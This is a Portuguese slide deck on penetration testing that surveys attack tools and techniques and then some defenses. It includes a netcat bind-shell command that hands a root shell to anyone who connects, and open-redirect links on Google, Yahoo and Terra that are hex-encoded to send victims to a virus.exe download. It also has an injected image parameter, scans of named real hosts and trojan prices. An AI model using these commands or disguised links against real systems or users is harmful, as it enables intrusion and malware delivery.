44
PENTEST Técnicas de invasão e defesa Por AnonFeh www.phillipewebdesigner.com www.virtuasolucoes.com

Pentest Invasão e Defesa - AnonFeh

Embed Size (px)

Citation preview

Page 1: Pentest   Invasão e Defesa - AnonFeh

PENTEST

Técnicas de invasão e defesa

Por AnonFeh

www.phillipewebdesigner.com

www.virtuasolucoes.com

Page 2: Pentest   Invasão e Defesa - AnonFeh

Tópicos

• Técnicas de

Invasão

• Definindo um alvo

• Recolhendo

informações

• Ferramentas úteis

• Phishing

• Esteganografia

• Técnicas contra

Invasão

• Firewall + IDS

• HIDS

• HoneyPots

• Antispam

Page 3: Pentest   Invasão e Defesa - AnonFeh

Técnicas de invasão

• Engenharia social

• Brute Force

• Espionagem

• Segurança por obscuridade

Page 4: Pentest   Invasão e Defesa - AnonFeh

Definindo um alvo

• Onde buscar informações?

• google

• myspace

• orkut

• google groups

Page 5: Pentest   Invasão e Defesa - AnonFeh

Google

• Buscas específicas

• Utilizando recursos avançados do google

como

• as tags Intitle, Inurl, Intext

• Podem te trazer resultados muito

interessantes.

Page 6: Pentest   Invasão e Defesa - AnonFeh

Engenharia social

• google

• dig

• nmap

• nessus

• Metasploit

• telnet

• sendip

• john the ripper

• host

• hping3

• netcat

Ferramentas úteis

Page 7: Pentest   Invasão e Defesa - AnonFeh

Dig

• Uma ferramenta similar ou nslookup

porém mais flexível, pode ser utilizada

para fazer buscas como A,TXT, MX e NS.

Page 8: Pentest   Invasão e Defesa - AnonFeh

dig +qr google.com any

• ;; ANSWER SECTION:• google.com. 10186 IN

MX 10 smtp2.google.com.

• google.com. 10186 IN MX 10 smtp3.google.com.

• google.com. 10186 IN MX 10 smtp4.google.com.

• google.com. 10186 IN MX 10 smtp1.google.com.

• google.com. 318637 IN NS ns1.google.com.

• google.com. 318637 IN NS ns2.google.com.

• google.com. 318637 IN

NS ns3.google.com.• google.com. 318637 IN

NS ns4.google.com.• ;; AUTHORITY SECTION:• google.com. 318637 IN

NS ns2.google.com.• google.com. 318637 IN

NS ns3.google.com.• google.com. 318637 IN

NS ns4.google.com.• google.com. 318637 IN

NS ns1.google.com.

;; ADDITIONAL SECTION:• smtp1.google.com. 2986

IN A 72.14.203.25• smtp2.google.com. 2986

IN A 64.233.167.25• smtp3.google.com. 2986

IN A 64.233.183.25• smtp4.google.com. 2986

IN A 72.14.215.25• ns1.google.com. 345220

IN A 216.239.32.10• ns2.google.com. 345220

IN A 216.239.34.10• ns3.google.com. 345219

IN A 216.239.36.10• ns4.google.com. 345219

IN A 216.239.38.10

Page 9: Pentest   Invasão e Defesa - AnonFeh

PortScan

Page 10: Pentest   Invasão e Defesa - AnonFeh

Nmap

• é o mais famoso portscan existente hoje.

(www.insecure.org/nmap). É uma ótima

ferramenta, muito utilizado por hackers,

para descobrir falhas no sistema, em

portas abertas desnecessariamente.

Page 11: Pentest   Invasão e Defesa - AnonFeh

Nessus

• O Nessus é uma ferramenta de auditoria

muito usada para detectar e corrigir

vulnerabilidades nos PCs da rede local

porem é muito utilizado por hackers para

descobrir a vulnerabilidade de um alvo.

Page 12: Pentest   Invasão e Defesa - AnonFeh

Reports

Page 13: Pentest   Invasão e Defesa - AnonFeh

Metasploit

• é um ambiente utilizado para escrever, testar, e executa códigos de exploit. Foi desenvolvido para prover penetração e testes em computadores relacionados a esse assunto, como também pesquisa de vulnerabilidade.

• Metasploit

• Linha de comando

• Interface web

Page 14: Pentest   Invasão e Defesa - AnonFeh

http://127.0.0.1:55555/

Page 15: Pentest   Invasão e Defesa - AnonFeh

msfconsole

Page 16: Pentest   Invasão e Defesa - AnonFeh

telnet www.alvo.com.br80

• Trying 200.189.171.181...

• Connected to www.alvo.com.br.

• Escape character is '^]'.

• GET / HTTP/1.1

• Host: www.alvo.com.br

Page 17: Pentest   Invasão e Defesa - AnonFeh

Resultado

• Server: Microsoft-IIS/5.0

• X-Powered-By: ASP.NET

• Content-Location: http://www.alvo.com.br/index.htm

• Date: Thu, 01 Nov 2007 13:26:39 GMT

• Content-Type: text/html

• Accept-Ranges: bytes

• Last-Modified: Tue, 19 Sep 2006 00:27:32 GMT

Page 18: Pentest   Invasão e Defesa - AnonFeh

John The Ripper

Um programa usado para decifrar senhas

suportado nas plataformas UNIX, DOS,

WinNT?/Win95. É um programa disponível

gratuitamente desenvolvido para decifrar

senhas MD5, DES baseado na função

CRYPT.

Page 19: Pentest   Invasão e Defesa - AnonFeh

hping3

• Mais uma ferramenta capaz de enviar

pacotes TCP, UDP e ICMP personalizados

e receber respostas como consegue em

icmp. Com ele você pode enviar arquivos

encapsulados e é util para ataques DoS.

Page 20: Pentest   Invasão e Defesa - AnonFeh

netcat

• Programa para consultoria de redes muito

conhecido, isso deve-se ao fato de ele ser

um programa muito versátil, podendo

desde ser um simples telnet, portscan até

um sniffer.

Page 21: Pentest   Invasão e Defesa - AnonFeh

netcat

• nc -l -e /bin/bash -p 1033

• A porta 1033 será colocada em listenning,

redirecionaremos a saída de dados para

um shell (/bin/bash). Assim quando

alguém se conectar a essa porta terá

domínio total sobre o computador.

Page 22: Pentest   Invasão e Defesa - AnonFeh

Sniffer

• # nc -vv -z 75.126.176.71 -p 80 22 110 25 21

• servidor9.molservidores.com [75.126.176.71] 22 (ssh) : Connection refused

• servidor9.molservidores.com [75.126.176.71] 110 (pop3) open

• servidor9.molservidores.com [75.126.176.71] 25 (smtp) open

• servidor9.molservidores.com [75.126.176.71] 21 (ftp) open

Page 23: Pentest   Invasão e Defesa - AnonFeh

Phishing

• Phishing é um tipo de fraude projetada

para roubar sua identidade. Em um

phishing scam, uma pessoa mal-

intencionada tenta obter informações

como números de cartões de crédito,

senhas, dados de contas ou outras

informações pessoais convencendo você

a fornecê-las sob pretextos enganosos.

O que é phishing?

Page 24: Pentest   Invasão e Defesa - AnonFeh

Exemplos de Phishing

• Alguns sites famosos que permitem este

tipo de fake:

• google

• yahoo

• terra

Page 25: Pentest   Invasão e Defesa - AnonFeh

Google

• http://www.google.com/pagead/iclk?sa=l&ai=Br3ycNQz5Q-fXBJGSiQLU0eDSAueHkArnhtWZAu-FmQWgjlkQAxgFKAg4AEDKEUiFOVD-4r2f-P____8BoAGyqor_A8gBAZUCCapCCqkCxU7NLQH0sz4&num=5&adurl=%63%6c%65%62%65%65%72%2e%6e%6f%2d%69%70%2e%6f%72%67%2f%76%69%72%75%73%2e%65%78%65

Page 26: Pentest   Invasão e Defesa - AnonFeh

Yahoo

• http://br.wrs.yahoo.com/_ylt=A0geum1Mv9RGw4EB6FXz6Qt./SIG=129lovkbd/EXP=1188434124/**%63%6c%65%62%65%65%72%2e%6e%6f%2d%69%70%2e%6f%72%67%2f%76%69%72%75%73%2e%65%78%65

Page 27: Pentest   Invasão e Defesa - AnonFeh

Buscador terra

• http://buscador.terra.com.br/Redirector.aspx?bstat=terrastats01&type=CK&source=buscador.terra.com.br&id=sponsored&partner=google&query=nike&position=1&target=%63%6c%65%62%65%65%72%2e%6e%6f%2d%69%70%2e%6f%72%67%2f%76%69%72%75%73%2e%65%78%65

Page 28: Pentest   Invasão e Defesa - AnonFeh

Destino???

• Nas 3 URLs anteriores a requisição seria

encaminhada para:

clebeer.no-ip.org/virus.exe

Page 29: Pentest   Invasão e Defesa - AnonFeh

Outro Exemplo

http://www.cceinformatica.com.br/[email protected]

Page 30: Pentest   Invasão e Defesa - AnonFeh

Adicionando...

&tipo=%3Cimg%20src=http://images.clebeer.multiply.com/logo/2%3E

Page 31: Pentest   Invasão e Defesa - AnonFeh

Esteganografia

• Esteganografia basicamente é uma

técnica de esconder um arquivo dentro de

outro arquivo, podendo ser uma imagem ,

ou documento do Word até mesmo uma

planilha de excel e etc só que de uma

forma criptografada.

Page 32: Pentest   Invasão e Defesa - AnonFeh

jp(hide an seek)

• O jphide e o jpseek são programas

utilizados para esconder mensagens em

arquivos JPEG.

Page 33: Pentest   Invasão e Defesa - AnonFeh

origem.jpg

Page 34: Pentest   Invasão e Defesa - AnonFeh

destino.jpg

Page 35: Pentest   Invasão e Defesa - AnonFeh

msg.txt

• Olá esta mensagem e secretae somente

pessoas que possuam a senha podem vê-

la senha:

@@(##!(*#$#*(!(@&%$(@)codDEVdw)22

31

Page 36: Pentest   Invasão e Defesa - AnonFeh

Utilização

• Esconder mensagem:

• jphide origem.jpg destino.jpg

mensagem.txt

• Descobir mensagem:

• jpseek destino.jpg texto-secreto.txt

Page 37: Pentest   Invasão e Defesa - AnonFeh

Quanto vale?

Trojan (Shell) - US$ 350,00 - US$700,00

Trojan (Roubo de Senhas) - US$600,00

Listagem E-mail (32 milhões) - US$1.500,00

Milhões de Usuários do ICQ - US$150,00

Proteção Contra Detecção do Trojan -

US$20,00

Suporte

Page 38: Pentest   Invasão e Defesa - AnonFeh

Tecnicas contra invasão

• Firewall

• (NHWK)IDS

• HoneyPots

• Antispam

Page 39: Pentest   Invasão e Defesa - AnonFeh

Firewall

• Port Knock, uma solução leve e fácil de

configurar, permite que portas específicas

só sejam abertas no momento desejado

atraves de tentativas de conexão em

portas específicas.

Page 40: Pentest   Invasão e Defesa - AnonFeh

*IDS

• NIDS – Network Intrusion Detection System

• HIDS - Host-based Intrusion DetectionSystem

• WIDS – Wireless Intrusion Detection System

• KIDS - Kernel Intrusion Detection System

Page 41: Pentest   Invasão e Defesa - AnonFeh

Honeypot

• Útil para vigilância e alerta aos tipos de

ataques mais utilizados porem deve ser

utilizado com cuidado para que o invasor

não tenha acesso a rede real.

Page 42: Pentest   Invasão e Defesa - AnonFeh

Antispam

• Indispensável para qualquer MX, útil para

evitar emails forjados e de domínios não

confiaveis, pode ser incrementado com

opções de RBL e CAPTCHA ("Completely

Automated Public Turing test to tell

Computers and Humans Apart").

Page 43: Pentest   Invasão e Defesa - AnonFeh

Conclusão

• Com a popularidade do SL a informação

ficou mais acessível o que colaborou para

um maior avanço das técnicas de invasão,

em contra partida os sistemas de

segurança vem se tornando mais estáveis a casa dia.

Page 44: Pentest   Invasão e Defesa - AnonFeh

Creditos

• Cartilha de Segurança - Códigos

maliciosos (Malware)

• http://cartilha.cert.br/malware/

• BRConnection - Internet Controlada

• http://www.brc.com.br/

www.virtuasolucoes.com

AnonFeh